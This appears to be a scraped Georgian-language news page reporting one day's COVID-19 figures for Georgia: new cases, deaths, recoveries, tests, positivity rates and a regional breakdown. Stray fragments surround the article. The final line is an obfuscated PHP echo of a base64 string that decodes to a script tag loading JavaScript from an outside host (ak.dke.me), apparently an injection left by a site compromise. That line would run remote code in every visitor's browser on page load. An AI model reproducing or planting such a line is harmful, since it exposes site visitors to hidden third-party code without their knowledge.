celsiusi
ავერსი შნაიდერი
საქართველოში ბოლო 24 საათში კორონავირუსის 4 278 ახალი შემთხვევა დადასტურდა, გარდაიცვალა კიდევ 63 ადამიანი.
 
ამავე პერიოდში გამოჯანმრთელდა 4 154 ადამიანი, ხოლო ჩატარდა 51 298 ტესტი.
 
რაც შეეხება დადებითობის მაჩვენებელს, 18 ნოემბრის მდგომარეობით, დადებითობის დღიური მაჩვენებელი არის 8.34%, ბოლო 14 დღის მანძილზე – 9.52% ხოლო 7 დღის მანძილზე – 8.99%.
 
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, დღევანდელი მონაცემებით, ჩატარდა 51 298 ტესტი, გამოვლინდა ინფიცირების 4 278 ახალი შემთხვევა, გამოჯანმრთელდა 4 154 პირი, დადებითობის დღიური მაჩვენებელი არის 8.34%
 
ახალი შემთხვევები ქვეყნის მასშტაბით ასე გადანაწილდა:
 
თბილისი – 1 749
აჭარა – 155
იმერეთი – 715
ქვემო ქართლი – 273
შიდა ქართლი – 412
გურია – 109
სამეგრელო – ზემო სვანეთი – 334
კახეთი – 267
მცხეთა – მთიანეთი – 110
სამცხე – ჯავახეთი – 114
რაჭა – ლეჩხუმი და ქვემო სვანეთი – 40
სულ საქართველოში კორონნავირუსის 804 571 შემთხვევა დადასტურდა, რომელთაგან 741 470 გამოჯანმრთელდა, გარდაიცვალა 11 352. 
852
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");